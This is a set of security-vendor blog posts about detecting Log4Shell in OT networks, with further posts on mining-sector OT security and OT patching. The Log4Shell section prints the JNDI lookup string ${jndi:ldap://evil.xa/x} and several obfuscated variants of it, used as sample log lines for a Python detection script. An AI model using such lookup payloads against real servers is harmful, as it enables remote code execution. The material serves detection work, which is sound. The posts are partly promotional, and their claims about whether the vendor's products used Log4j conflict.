
Detecting & Alerting Log4J with the SCADAfence Platform

Until two weeks ago, Log4j was just a popular Java logging framework, one of the numerous components that run in the background of many modern web applications. But since a zero-day vulnerability (CVE-2021-44228) was published, Log4j has made a huge impact on the security community as researchers found that it’s vulnerable to arbitrary code execution. 

The good news is that the Apache Software Foundation has already fixed and rolled out the patch for the vulnerability. On top of the patch, thanks to SCADAfence’s research and R&D team, our latest build supports the detection of Log4j exploit attempts.

Quick Recap of CVE-2021-44228 in Log4j

Log4Shell (CVE-2021-44228) is an unauthenticated remote code execution (RCE, code injection) vulnerability in the popular Log4j logging framework for Java. By exploiting it, an attacker can execute code fetched from a remote source on the targeted system. NIST has given this vulnerability a CVSS score of 10 out of 10, which reflects its criticality.

Over 3 billion devices run Java, and because there are only a handful of logging libraries, many of them are likely to run Log4j. Worse still, many internet-exposed target applications can be exploited by external users without authentication. 

Over the past two weeks, major OT vendors disclosed the security impact of this vulnerability on their software and equipment, and additional disclosures will continue as vendors work to identify the use of Log4j across their product lines. Initially, the Log4j vulnerability made it challenging to identify potentially impacted servers on a given network. For OT networks that have implemented network segmentation, the risk from the outbound connections the exploit depends on can be mitigated to an extent.

How To Ensure That Your Systems Are Safe

First, it’s important to understand that the root cause of this issue lies within the Log4j library. The Apache Software Foundation released an emergency patch for the vulnerability. You should upgrade your systems to Log4j 2.15.0 immediately or apply the appropriate mitigations.

Our OT security threat intelligence database learns the behaviors associated with attempts to leverage this vulnerability, highlights them, and provides remediation guidance. Customers are notified of Log4j exploit attempts as well as of any anomaly flagged by our anomaly detection engine. Independently of these signatures, our customers are already protected by the efficacy of that anomaly detection.

The SCADAfence Platform, the Governance Portal, and the Multi-Site Portal do not use Log4J or the Apache server, and thus SCADAfence product installations are updated and secure from the Log4J vulnerability. Customers do not need to take action for any of our on-prem or hosted web solutions.

At SCADAfence, we felt network segmentation wasn’t enough to fight off this critical vulnerability. The latest build of the SCADAfence Platform detects exploit attempts and lets customers leverage our OT security threat intelligence service so they can patch and mitigate this exploit on any of their OT devices.


The SCADAfence Platform Detects & Alerts if an OT Asset is Vulnerable to the Log4Shell Vulnerability

We’ve updated the Log4Shell/Log4j exploit detection inside the SCADAfence Platform as the situation has evolved. We added CVE signatures to our database that detect and alert on RCE (Remote Code Execution) exploit attempts.

The following CVEs were added to the SCADAfence database to correlate and alert on vulnerable OT assets:

  1. CVE-2021-44228   
  2. CVE-2021-45046 
  3. CVE-2021-4104
  4. CVE-2020-9488
  5. CVE-2019-17571
  6. CVE-2017-5645
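As an added illustration of what correlating an asset inventory against these six CVEs involves (example code written for this page, not SCADAfence’s database or signatures), the script below matches a constructed OT asset inventory against version ranges for each CVE. The affected-version ranges are encoded from the public NVD/Apache advisories as the author recalls them and should be treated as assumptions to be verified against the advisories; backport fix releases such as 2.12.2 for the Java 7 line are deliberately not modelled. The inventory records are constructed sample data.

```python
"""Correlate an OT asset inventory against the Log4j CVEs listed above.

Added example for this page, not SCADAfence code. The affected-version
ranges below are ASSUMPTIONS recalled from the public NVD/Apache
advisories: verify them against the advisories before relying on them.
The first affected version is inclusive, the "fixed" version exclusive;
backport fix releases (e.g. 2.12.2 for the Java 7 line) are not modelled.
"""
import re

# (CVE id, first affected version, first fixed version, short description)
LOG4J_CVES = [
    ("CVE-2021-44228", "2.0-beta9", "2.15.0", "JNDI lookup RCE (Log4Shell)"),
    ("CVE-2021-45046", "2.0-beta9", "2.16.0", "incomplete fix for CVE-2021-44228"),
    ("CVE-2020-9488", "2.0-alpha1", "2.13.2", "SMTPAppender TLS host validation"),
    ("CVE-2017-5645", "2.0-alpha1", "2.8.2", "SocketServer deserialization"),
    ("CVE-2021-4104", "1.2.0", "1.3.0", "JMSAppender deserialization (Log4j 1.x)"),
    ("CVE-2019-17571", "1.2.0", "1.3.0", "SocketServer deserialization (Log4j 1.x)"),
]

# Log4j version strings look like "1.2.17", "2.14.1", "2.0-beta9", "2.0-rc2".
_VER_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.I)
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}  # a final release ranks 3


def version_key(version: str) -> tuple:
    """Turn a Log4j version string into a sortable tuple.

    Pre-releases sort before the final release of the same number, so
    2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1.
    """
    m = _VER_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version string: {version!r}")
    major, minor, patch, pre, pre_num = m.groups()
    rank = _PRE_RANK[pre.lower()] if pre else 3
    return (int(major), int(minor), int(patch or 0), rank, int(pre_num or 0))


def matching_cves(version: str) -> list:
    """CVE ids whose affected range contains this Log4j version."""
    key = version_key(version)
    return [
        cve for cve, first, fixed, _ in LOG4J_CVES
        if version_key(first) <= key < version_key(fixed)
    ]


# Constructed sample inventory: asset name, software component, version.
INVENTORY = [
    {"asset": "hmi-01", "software": "log4j", "version": "2.14.1"},
    {"asset": "historian-02", "software": "log4j", "version": "2.15.0"},
    {"asset": "eng-ws-03", "software": "log4j", "version": "1.2.17"},
    {"asset": "scada-srv-04", "software": "log4j", "version": "2.17.0"},
    {"asset": "plc-gw-05", "software": "modbus-gw", "version": "3.1"},
]


def correlate(inventory: list) -> dict:
    """Map each asset running an affected Log4j version to its CVE ids."""
    findings = {}
    for rec in inventory:
        if rec["software"].lower() != "log4j":
            continue  # only Log4j records are in scope for these signatures
        cves = matching_cves(rec["version"])
        if cves:
            findings[rec["asset"]] = cves
    return findings


if __name__ == "__main__":
    for asset, cves in correlate(INVENTORY).items():
        print(f"{asset}: {', '.join(cves)}")
```

Note that an asset on 2.15.0 still matches CVE-2021-45046, which is exactly why the second CVE is in the list: upgrading to 2.15.0 alone does not clear the signature.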

How Can You Deploy the Latest Version of SCADAfence?

The latest version of the SCADAfence Platform which detects the CVE signatures relating to the vulnerability is available in build 6.6.1.167. To get the latest version, please contact your customer success representative.

If your organization is looking into securing its industrial networks, the experts at SCADAfence are seasoned veterans in this space and can show you how it’s done. 

To learn more about SCADAfence’s array of OT & IoT security products, and to see short product demos, click here: https://l.scadafence.com/demo

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of the world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.

A SCADAfence Update Regarding The Log4Shell Vulnerability

December 10, 2021, will always be remembered by the security community as the day a highly critical zero-day vulnerability was found in log4j, the very popular logging library for Java applications, and identified as CVE-2021-44228. Not long after, the name “Log4Shell” was coined for the exploit, and every organization, no matter its size, including every security vendor, rushed to mitigate the zero-day vulnerability within its applications. This patching marathon is still a work in progress as we speak.

Log4Shell is a critical vulnerability that requires urgent action. We can’t stress enough how important this Log4Shell vulnerability is. It’s a critical security vulnerability with a CVSS score of 10 that allows attackers to execute code remotely in any vulnerable environment. 

If you have not mitigated the Log4Shell vulnerability, we strongly recommend upgrading to the latest v2 version of Log4j, which includes the recent vulnerability fix. You can find the mitigation process in Apache’s official Migration from Log4j v1 document. If you are unable to upgrade to the latest version, our research team recommends disabling JMSAppender or blocking any user input from reaching its configuration.

How the Log4Shell Vulnerability Works

The Log4Shell vulnerability targets the parts of Log4j that parse and log user-controlled data, and it allows attackers to compromise vulnerable applications. It takes advantage of Log4j’s ability to use JNDI, the Java Naming and Directory Interface. By using JNDI lookups, an attacker can force the vulnerable application to connect to an attacker-controlled LDAP (Lightweight Directory Access Protocol) server that serves a malicious payload. Here is a visual diagram of the attack chain from the Swiss Government Computer Emergency Response Team.

[Diagram: Log4Shell attack chain, from the Swiss Government Computer Emergency Response Team]

To exploit a vulnerable target, attackers must trick the application into writing a log entry that includes a string such as ${jndi:ldap://evil.xa/x}. In many applications logging is essential, and a great deal of information about every incoming request is logged, which is why the string can arrive through so many different attack vectors. Until mitigation steps and patching are complete, no application or attack vector can be considered safe from Log4Shell.
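To make the detection side of this concrete, here is an added example (written for this page, not SCADAfence’s detection logic) that scans constructed web-server log lines for the lookup string described above. Because Log4j resolves nested lookups before the JNDI lookup runs, a detector that only searches for the literal text `${jndi:` misses entries that spell the keyword through nested `${lower:...}` or default-value `${...:-...}` lookups, so the example collapses those first and only then checks for a JNDI lookup. Apart from the `evil.xa` host taken from the post, the sample lines are constructed.

```python
"""Detect Log4Shell-style JNDI lookup strings in logged request data.

Added example for this page, not SCADAfence's detection logic. It scans
constructed web-server log lines for the ${jndi:...} lookup described
above. Log4j resolves nested lookups before the JNDI lookup runs, so the
keyword may be spelled via ${lower:j}, ${upper:J} or default-value
${anything:-j} pieces; those are collapsed first, then the result is
checked for a JNDI lookup with any scheme Log4j 2.x JNDI accepts.
"""
import re

# Nested lookups that evaluate to their own argument when nothing resolves.
_NESTED = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"   # ${lower:X} / ${upper:X}  -> X
    r"|\$\{[^${}]*:-([^${}]*)\}",        # ${name:-X} (default value) -> X
    re.I,
)
# The JNDI lookup itself, with the URI scheme captured for reporting.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)\s*:", re.I)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups inside-out until nothing changes, then lowercase."""
    for _ in range(max_rounds):
        collapsed = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if collapsed == text:
            break
        text = collapsed
    return text.lower()


def scan_log(lines):
    """Return (1-based line number, JNDI scheme) for every line carrying a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1)))
    return hits


# Constructed sample access-log lines (the evil.xa host comes from the post).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /status HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://evil.xa/x}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://evil.xa/x}"',
    '10.0.0.7 - - "GET /api HTTP/1.1" 200 "${${::-j}${::-n}di:rmi://evil.xa/a}"',
    '10.0.0.3 - - "GET /docs?q=${date:yyyy} HTTP/1.1" 200 "curl/7.68"',
]


if __name__ == "__main__":
    for number, scheme in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme}: {SAMPLE_LOG[number - 1]}")
```

The last sample line carries a legitimate `${date:...}` lookup and must not fire; the check is on the normalized `jndi:` keyword followed by a scheme, not on `${` alone, which keeps false positives from ordinary templated log content low. Matching in monitoring is a detection aid only; the fix remains the upgrade described above.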

ICS/OT industry Response to Log4Shell

When the exploitation was first reported, the ICS/OT industry didn’t think it was affected, but ICS manufacturers are now rushing to respond to Log4Shell.

Siemens confirmed that 17 of its products were affected by CVE-2021-44228 and that they have started to release patches and provide mitigation advice. Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.

Schneider Electric also released an advisory, but announced that it is still determining which of its products are affected. Inductive Automation, which provides SCADA software and industrial automation solutions, announced that it conducted a full audit and determined that its products are not impacted.

While OT/ICS vendors are responding to Log4Shell and publishing advisories, this is not enough to ensure that OT environments and devices are secure against the Log4Shell vulnerability. Now that OT networks are becoming increasingly connected, the attack surface is widening and increased risk is likely. Unlike in IT, OT environments have much more at stake. To ensure this vulnerability won’t cause more harm than necessary, organizations should look into network segmentation in their OT environments. This will decrease the chance that their OT devices and networks will be exploited via the Log4Shell vulnerability.

Too often, OT devices are outdated and no current version or upgrade is offered for them, which allows attackers to exploit an OT environment with ease. Where OT vendors do provide a patch or upgrade, organizations need to apply it. However, OT teams sometimes won’t update their technology to the secure version because of a “don’t fix what’s not broken” approach. This outdated and passive approach can leave the organization’s OT infrastructure an easy target for attackers.

SCADAfence’s OT Security is Here to Help

First of all, at SCADAfence we are here to assure you that all our products (the SCADAfence Platform for OT Security, the Governance Platform, and the Multi-Site Platform) are updated and secure from the Log4Shell vulnerability. We remediated the Log4Shell vulnerability in our deployed application services’ code. Customers do not need to take action for any of our hosted web solutions.


The SCADAfence Platform Detects & Alerts if an OT Asset is Vulnerable to the Log4Shell Vulnerability

On top of ensuring that our products are secure, SCADAfence’s researchers analyzed the vulnerability, and the SCADAfence Platform now detects and alerts if an OT asset is vulnerable to the Log4Shell zero-day vulnerability. SCADAfence customers can leverage our OT security threat intelligence service to ensure they can patch and mitigate this exploit on any of their OT devices.

On top of offering OT security threat intelligence, SCADAfence enables organizations to increase their visibility into their entire network, as it’s difficult to protect what you cannot see. A further recommended practice is to adopt security network monitoring solutions that provide network segmentation and micro-segmentation, as this will help organizations prevent similar exploitations going forward.

Still Patch, Patch, Patch 

Patching is still your best bet to combat this vulnerability. If patching isn’t possible, implementing mitigation techniques is the next best path to minimize the attack surface. SCADAfence’s research team is monitoring the evolution of this vulnerability and will provide additional information and support as needed. 

If your organization is looking into securing its industrial networks, the OT & IoT cyber security experts at SCADAfence are seasoned veterans in this space and can show you how it’s done. 



Simplifying Cyber Security for the Mining Industry

The COVID-19 pandemic has been detrimental to the world economy while flattening many industries. The mining industry was fortunate to be one of the very few industries to deliver exceptional growth throughout this period. Yet this growth has marked the mining industry out as a lucrative target for cybercriminals.

 

Cybercrime has increased over the course of the pandemic as threat actors try to take advantage of the rapidly changing circumstances, misinformation, and organizations’ shift to a hybrid workplace. The rewards for successful cyber-attacks are staggering. To put this in perspective, it is currently estimated that cyber-crime is worth more than the illegal drug trade globally, with billions of dollars paid out each year in ransomware. Cybercrime continues to accelerate and is expected to cost 10.5 trillion USD annually by 2025.

Cybercriminals are also becoming more innovative and creative as they target complex, business-critical Operational Technology (OT) environments, including Industrial Control Systems (ICS) and Supervisory Control And Data Acquisition (SCADA) systems.

Several high-profile attacks have demonstrated both the increasing sophistication of attacks and the devastating effects of a breach in these environments. In 2010 a malicious worm traveled for years to eventually find its SCADA target at an Iranian nuclear plant. More recently, in February 2021, a hacker attempted to poison the water supply of Oldsmar in Florida by using remote access to alter the levels of sodium hydroxide in the water. Though the attempt was thwarted, it illustrated the threat to industrial control systems. Then in May, hackers successfully gained entry into the Colonial Pipeline Company network, which led to the shutdown of their 5,500-mile fuel pipeline, a shortage of petroleum in the USA and a ransom pay-out of $5.6 million.

The rapid shift to remote work during the lockdown, and the consequential increase in cyber threats arising from the greater attack surface, have increased the demand for cybersecurity skills. Combined with the existing global shortage of cyber expertise, this demand means many organizations struggle to find and keep the people required to effectively manage security governance and operations across IT/OT environments. In response, we are now seeing increasing adoption of managed security services such as managed detection and response (MDR) solutions and vulnerability and threat identification tools designed specifically for OT systems.

Targeted mining attacks have the potential to affect four parts of operations: extraction, processing/refinement, stock management, and shipping. Each function presents a different set of risks that, if exploited, can reduce efficiency, inhibit operations, and cause financial turmoil. Given the extremely dangerous environments that mine sites present – heavy machinery, fumes, and explosives – the effect of a cyberattack on safety technologies such as wearables and gas detectors is possibly the most severe example.

Understanding the OT Environment 

Security analysts need to understand what is happening within OT systems with a unified system that monitors and assesses both OT and traditional IT environments. Complete coverage of an industrial mining network must include continuous monitoring of the components within the industrial network, such as programmable logic controllers or remote terminal units. Companies need to be continually monitoring governance and compliance aligned to industry good practice and ensuring coverage extends to IoT devices and machinery.

With such complex environments, many mining companies face an increasingly complex task to manage their cybersecurity. It is not uncommon to see companies procure half-a-dozen or more solutions. In fact, one study found 40% of organizations use 10 to 25 separate security tools, and 30% use 26 to 50 tools. This only adds to security teams’ burden. Furthermore, traditional security tools often don’t provide the required visibility into OT networks and devices that companies need to operate.

The key to managing this complexity and simplifying security is to bring network visibility, asset monitoring, vulnerability management, threat intelligence and threat detection into one solution. Security teams can focus on identifying, understanding, and remediating issues rather than managing data and tools. Tooling that is OT-specific and run by professionals who understand the nuances of OT environments is key.

Industry-leading OT security

At Rapid7, we know cyber security. We have two decades of experience in helping organizations advance their security postures and have assisted in increasing customers’ cyber security maturity. Our solutions are built to incorporate the change in modern environments, including the continued convergence of OT, and we offer clarity of risk, while helping secure your entire attack surface.

At Rapid7, we provide targeted threat detection through our External Threat Intelligence platform, allowing you to leverage tailored and actionable intelligence based on unique digital assets. This enables you to identify, block, and takedown attacks that directly target your industry and digital operations.

For example, you can identify new malware kits and exploits that target production line equipment and/or OT devices, or monitor hacker chatter to prioritize and lock down vulnerabilities before they are exploited.

To expand the power of our solution in OT environments, we have partnered with the award-winning SCADAfence team to develop deep integrations between the two platforms to meet IT and OT security needs. Security teams now have a consolidated solution for IT, OT and IoT vulnerability management, threat intelligence, and incident detection and response.

SCADAfence is an industrial cybersecurity solution that provides visibility and monitoring for the mining industry’s OT & IoT networks. SCADAfence was recently recognized as Frost & Sullivan’s 2021 Entrepreneurial Company of the Year and positioned as a Leader in the new Frost & Sullivan Radar for the global critical infrastructure cyber security market. SCADAfence also won three coveted Global InfoSec Awards at the RSA Conference, including ICS/SCADA market leader.

SCADAfence’s solution automates asset discovery and inventory management, as well as threat detection and risk management. Remote access security capabilities enable security teams to track user activities and detect those that are outside the user profile or are malicious in nature.

By employing a wide range of algorithms, machine learning and AI, the platform detects anomalies and security events that can compromise availability and affect the safety and reliability of the OT network and its assets. A governance portal also measures compliance across all sites and identifies gaps or bottlenecks to help improve organizational security at scale.

SCADAfence provides 100% deep packet inspection of all SCADA/ICS/IoT traffic out of band, and offers Governance and Compliance modules for ISO, NERC CIP, EU and many other compliance standards, providing a seamless reporting mechanism on the cyber security posture within OT environments. This ensures that reporting aligns with your defined security frameworks.

A Consolidated Approach to Mining OT security

Rapid7 has integrated SCADAfence’s specialized OT monitoring with our industry-leading Insight platform to provide a comprehensive security solution without overwhelming your teams. The integration works bi-directionally and adds great security and manageability. Vulnerability data is collected from across the corporate IT and OT environments and provides visibility in a single interface for a comprehensive insight into IT/OT vulnerabilities.

Threats identified within the OT environment are communicated to teams via a central Security Information and Event Management (SIEM) solution (e.g. Rapid7’s InsightIDR). This, combined with the centralized vulnerability information, is what provides the single interface of all identified vulnerabilities and threats within the IT/OT environments.

The Rapid7 XDR solution (InsightIDR) ingests all your IT/OT threat data, as well as network traffic analysis (NTA), user and entity behavior analytics (UEBA) and endpoint detection and response (EDR) data, to provide a complete view of your environment’s attack surface.

The XDR solution provides security teams with a single, centralized solution that can quickly identify malicious behavior across your entire environment.

In addition, with Rapid7 IntSights, our Threat Intelligence (TI) solution can also look for external threats from the clear, deep, and dark web, picking up industry targeted attacks, leaked company credentials, brand impersonation, executive impersonation and much, much more.

As a result, mining companies now have a single consolidated solution for IT/OT/IoT security, vulnerability management, threat intelligence, extended detection and response, and security orchestration and automation.

Opinion Disclaimer

The views and opinions expressed in this post are those of the author and do not represent the official policy or position of SCADAfence.

This article was originally published in the Australian Mining Review and is authored by John Rice, Account Executive at Rapid7.

The original post can be found here: https://australianminingreview.com.au/latest/#page=88


This Thanksgiving, Be Thankful for OT Security

Thanksgiving – when families get together and express gratitude for everything they have over some food and hopefully some football. For most families and especially security teams, this is a time for looking back to evaluate the past year and to give thanks for how far we’ve come. 

When looking back at the past 12 months for the OT security community, it was a challenging year as the industry was bombarded with increasing amounts of successful ransomware attacks on industrial and critical infrastructure organizations. Instead of highlighting the attacks, we believe it’s better to focus on the different aspects of OT security that we are truly thankful for. 

Here at SCADAfence, we are grateful for all the efforts and innovation put in by our team and the collective OT security community. The sleepless nights and ongoing devotion to improving OT network visibility and security for industrial organizations is something everyone can be thankful for this thanksgiving. 

From the increasing awareness of IT-OT convergence to the US Government emphasizing the security risks that relate to OT environments, 2021 is a clear sign that OT security is headed in the right direction and gaining awareness among board members and C-level executives worldwide.

As we look back at the past year and move forward, here are the five reasons why we are thankful for OT security.

IT-OT Convergence

Just like on Thanksgiving, some family members might not see eye to eye at first but by the end of the night, everyone is happy and in agreement. This yearly experience is very relatable for security experts in IT and OT teams as they need to work together when it comes to the responsibility of OT security and converging networks.  

Up until recently, IT and OT teams rarely worked together as OT security teams were not in charge of advanced threats and IT security. With the advancement of operational technology and the adoption of industrial IoT devices, the need to converge IT and OT networks and systems is becoming more popular by the day with industrial organizations. 

With the increasing use of IP-based communications with OT devices, IT and OT teams face a bigger challenge in understanding who is in charge of securing OT systems, and this has created a cultural divide between the teams. Technical barriers and a lack of clear ownership are the key reasons IT and OT teams are less open to working together. While awareness of this challenge is increasing, we are seeing more organizations invest in technologies and governance platforms to improve collaboration, as they see that proper IT-OT convergence is a crucial aspect of their cyber security program.

Similar to families making up at the end of the Thanksgiving dinner, when IT & OT teams both come to the mutual table to wine and dine, it can result in improved visibility and transparency for an organization’s complete network security. At SCADAfence we have seen many of our customers adopt a seamless IT-OT convergence approach including one of the leading oil and gas organizations who are experiencing complete network visibility to all 71 of their global production sites.

OT Detection & Response

As industrial organizations become more interconnected, they potentially have more exposure to vulnerabilities. The high cost of industrial equipment and the damages to communities and economies that an attack could cause are key factors for organizations who are looking to protect their industrial networks. In addition, aging legacy equipment in factories, safety regulations that forbid any modifications being made to equipment and industry compliance regulations have created quite the challenge for OT teams.

Despite all of this, it is possible to secure industrial networks without disturbing regular operations and without risking non-compliance. By using OT security solutions that provide continuous threat detection and establishing the right security policies, OT security teams can put an effective OT strategy in place that will protect their organization’s processes, people and profit while significantly reducing security incidents and vulnerabilities.

Asset Inventory Management 

Effective cyber security in OT requires a deep foundation of asset information. Until recently, OT teams didn’t have the resources or tools to maintain such an asset inventory. When organizations don’t deploy asset inventory management within an OT environment, it creates a major visibility hole, as they won’t know the security status of their environments.

In some cases, industrial organizations create only a simplified asset inventory that captures the data needed for security tasks. Organizations need to change their approach to asset inventory management and see it as the foundation of their OT security program.

When detecting new vulnerabilities in OT networks and devices, organizations rely on their asset inventory to decide the severity of the vulnerability, how to patch the device and how it affects their environments. With an automated asset inventory, industrial organizations will increase the productivity and efficiency of their OT teams by quickly managing their assets data to detect and protect their environments all in one dashboard.  

Governance and Compliance 

Compliance regulations in OT are another aspect for security leaders to be thankful for, as they are crucial for the security and production of industrial organizations. In recent years, there has been a growing demand for standards and guidelines to manage the risk exposure of OT infrastructures. IT and OT departments, who typically manage the cyber security standards across the organization, are now required to monitor compliance with these standards across the various OT locations. On the other hand, the information provided today by the various IT tools is dispersed and technical in nature. This makes translating it into risks and prioritizing actionable mitigations very challenging and time-consuming.

Organizations need to automate their governance processes with a solution that enables the IT and OT departments to centrally define and monitor adherence to organizational policies and to OT-related regulations. The solution should be configured and managed from a central location and aggregate compliance information from all sites in the organization. It should also connect to other security systems, providing a cross-organizational, comprehensive compliance posture.

OT Remote Access

Industrial organizations have undergone an evolution: where most OT environments were once isolated systems, most OT systems are now connected to the internet. This is occurring because organizations are deploying new technology that allows increased remote access to OT systems.

Providing remote access to OT systems creates an advantage for industrial organizations, but it also comes with more risk. Increasing the connectivity of OT systems and devices to the internet can result in exploitation via cyber attacks. The constant increase in attacks on critical infrastructure and the convergence of IT and OT systems have quickly increased the adoption of remote access security in critical infrastructure and industrial organizations.

To fight off remote access security risks within OT environments, organizations need to deploy OT security solutions that come integrated with remote access features that are specifically designed for OT environments. By deploying an OT security platform that integrates remote access security that does not require any changes in network architecture, it will ensure that the OT systems are properly configured to detect and correlate remote user activity and detect if there is any malicious network activity.

Lastly, all of us at SCADAfence would like to thank our readers. It’s a privilege to share our passion for a subject with fellow security-minded folks. We wish everyone who’s celebrating a safe and happy Thanksgiving!

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, endpoints, infrastructure, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, points of sale, resellers, and partner companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum that includes Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of the world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.

To Patch or Not to Patch in OT

When organizations seek out the right cybersecurity controls for their OT environments and devices, the clear objective is to reduce and eliminate risk. Too often, organizations adopt only a minimal level of security. While each organization defines its own security risk levels, these are usually based on its production environments, its industrial devices and how critical its facility's production is.

Many organizations use different techniques to manage their risks, but one of the most common is patching. Patching sits at the heart of every security strategy and is one of the key elements in closing potential vulnerabilities within an organization. Yet despite patching being a standard part of risk management strategies, patching for OT devices is still a work in progress.

Patch management in OT and Industrial Control Systems (ICS) comes with many security challenges. Between a lack of OT experts, proprietary hardware and software, compliance regulation reporting, minimal testing equipment, and device and system maintenance, many industrial organizations struggle to understand clearly how they need to patch their vulnerable devices. The result is unmanaged patches.

Industrial Device Vulnerability Management Processes

When deciding what needs to be patched, security teams need to evaluate the practicability of OT patching for their organization. In OT environments, applying a patch is a balance between the security benefit the patch provides and the disruption to operational activities that patching causes. Both are crucial factors to weigh when patching OT environments.

Every standard OT security patching program starts with four steps to success. The first step is to detect and discover which assets you have within your OT environments. The next step is to assess the industrial devices and OT equipment for vulnerabilities. There are different types of vulnerabilities, but most fall into the categories of security risks or software and device misconfiguration.

The third step is to analyze and prioritize the vulnerabilities. This is where organizations learn which devices are vulnerable and which are not, and what priority to assign to patching the vulnerable devices. At this step, organizations will sometimes ask whether they should even patch the vulnerability, or why they should care about it. While it is an organization's job to decide what to patch and what not to patch, we recommend patching all vulnerabilities to keep the organization secure.

The fourth and final step is remediating the vulnerability. This is where security teams patch the vulnerabilities within their industrial devices, for example by patching a PLC, fixing device configurations and more.

IT Patching Does Not Work in OT

Today’s organizations need to run different kinds of security testing to understand clearly which vulnerabilities they have in their OT environments. In IT security, most organizations adopt vulnerability scanning tools. Asset vulnerability scans are typically based on port enumeration and on authenticating to the devices to collect comprehensive configuration, policy and registry information. While this may be useful for IT security, it does not work for OT security.

For example, an automotive manufacturer in Germany had a couple of critical servers connected to its production line. The servers crashed after a vulnerability scan. They had scanned only to check for a single vulnerability in their environment; although they knew exactly what they were scanning for, the scan still affected their OT environment. The servers were a key part of the manufacturing process, and the failure caused downtime and a loss of revenue of over a million dollars.

When they investigated the problem, they found that the scanner opened 13 sockets while the servers supported only up to four sockets in parallel. The scanner flooded the servers with a load three times higher than normal. The servers were unable to handle their operational processes and crashed.

The lesson from this example is that bringing an IT security approach of vulnerability scanning into OT can cause an organization more damage than a cyber attack.

Don’t Forget about the Costs

Now that organizations know the four-step process of device patch management, the cost of patching is a crucial aspect they must be aware of. Once organizations have all the information (asset inventory, network mapping, disclosure sources and maps of vulnerabilities) and are ready to patch the vulnerabilities, they need to understand the price of patching.

Each patching process has a different cost associated with it, and it should not be taken lightly. Every industrial organization’s biggest nightmare is production downtime. Every patching process brings some kind of downtime, but when managed correctly it lasts only a short period of time. However, when an organization does not manage the industrial device management process correctly, the financial impact reaches beyond the production line and into the headlines.

At SCADAfence, we have helped many industrial organizations patch their OT devices. One common theme we have seen is that when we show an organization its vulnerabilities, it goes ahead and fixes only that one vulnerability rather than the entire vulnerable device. This is a serious problem, because if an organization does not fix the core issue behind a vulnerability, attackers will easily find another one. Organizations need to patch the entire device to ensure no vulnerabilities are left behind.

Industrial Device Patching Comes with Benefits

Now that we have explained the cost risks of improper patching methods, organizations should also consider the benefits. While patching OT devices can at times risk devices and servers crashing, which results in downtime, there is a real benefit to patching.

One of the biggest benefits organizations experience is having an asset inventory, which is a great place to start. An automatic asset inventory is the most efficient and accurate way to visually manage an organization’s industrial devices and understand whether those devices have vulnerabilities. Mapping vulnerabilities to assets allows organizations to prioritize the patching of vulnerable devices and increases visibility into the connection points of each device on the OT network.

In addition, we recommend isolating vulnerable devices from the rest of the OT network. In some cases, an OT device will have a vulnerability for which no patch is available. This can happen when the protocols of a specific industrial device impose restrictions that are too lenient, which makes the device more vulnerable. Isolating vulnerable devices helps keep attackers from moving laterally within the OT environment.

Simplifying Industrial Device Management

Moving forward, organizations need to assume that there are always unpatched devices in their OT networks, either because they cannot be patched or because they have not been patched yet. A concrete industrial device patch management strategy allows security teams to efficiently detect vulnerabilities and attacks early, before attackers exploit the devices.

The answer to the question “to patch or not to patch” is not a simple yes or no.

We recommend adopting an industrial device patching approach based on actual trial testing with different scenarios. Understanding real-time device data and vulnerability information allows organizations to prioritize their patching of industrial devices.

To learn more about industrial device patching, join Rapid7 and SCADAfence on November 10th at 11 am EST for a joint webinar: The Comprehensive Guide to Industrial Device Patching.

During the webinar, we will provide three excellent tools to help you with the decision-making process of whether “to patch, workaround or do nothing.”
